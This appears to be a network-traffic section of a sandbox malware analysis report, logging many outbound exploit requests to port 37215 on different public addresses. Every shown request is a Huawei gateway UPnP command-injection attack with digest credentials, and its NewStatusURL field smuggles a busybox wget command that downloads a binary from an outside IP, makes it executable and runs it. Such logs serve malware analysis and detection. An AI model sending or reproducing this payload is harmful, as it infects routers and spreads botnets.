                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              345192.168.2.153609837.220.101.14437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.209794044 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              346192.168.2.1541036122.183.112.2037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.717771053 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              347192.168.2.1555912181.47.220.24337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.717787981 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              348192.168.2.155604041.159.76.3737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.717807055 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              349192.168.2.1555508190.234.248.11837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.717822075 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              350192.168.2.1546852181.146.165.10537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.717848063 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              351192.168.2.1559140222.26.72.1837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.717855930 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              352192.168.2.1545604138.11.48.18737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.717869043 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              353192.168.2.153693837.198.166.19237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.717904091 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              354192.168.2.1540482122.14.178.8837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.717905998 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
